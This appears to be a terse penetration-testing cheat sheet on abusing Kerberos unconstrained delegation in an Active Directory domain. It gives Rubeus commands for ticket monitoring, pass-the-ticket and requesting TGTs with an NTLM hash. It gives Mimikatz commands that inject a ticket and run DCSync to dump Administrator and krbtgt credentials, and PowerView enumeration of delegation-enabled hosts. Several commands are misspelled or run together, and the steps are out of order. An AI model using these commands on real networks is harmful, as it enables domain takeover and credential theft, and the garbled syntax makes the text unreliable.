General/Basic or Unconstrained Delegation which allows the first hop server (web server in our example) to request access to any service on any computer in the domain.
Required
Define Unconstrained Delegation Machines
we need to user who has Access to the machine
Essentially this looks like so: User --- authenticates to ---> IIS server ---> authenticates on behalf of the user ---> DB server
Hint: discover users that who you have WriteDACL permission on there or do Enumeration to get user
Rubeus
.\Rubeus.exe ptt /tikcet: base64.exe monitor /monitornterval:10/targetuser$ /nowarp.\Rubeus.exe ptt /tikcet: base64 .\rubeus.exe asktgt /user:abdo /domain:hacktor.local /ntlm:Hash /outfile:FileName.tgt#ORcat b64.txt|base64 -d > ticket.kirbi
After obtaining the TGT tickets from the domain controller, we can now request service tickets for the allowed services, i.e., CIFS and TIME, or alternate services like LDAP or WMI.
mimikatz.exe"privilege::debug""kerberos::ptt PDC.kirbi""lsadump::dcsync /domain:hacktor.local /user:Administrator""exit"#Once the ticket is injected, run DCSyncInvoke-Mimikatz-Command '"lsadump::dcsync /user:dcorp\krbtgt"'
now enumerating the computers which have unconstrained delegation enabl
.\powerview.ps1Get-NetComputer -Unconstrained
Example output: We find the computer WIN-Q4788GPE9L7 with unconstrained delegation enabled.
Step 2: Find Local Admin Access
Find-LocalAdminAccess
Output: Our user has local admin access to the computer with unconstrained delegation.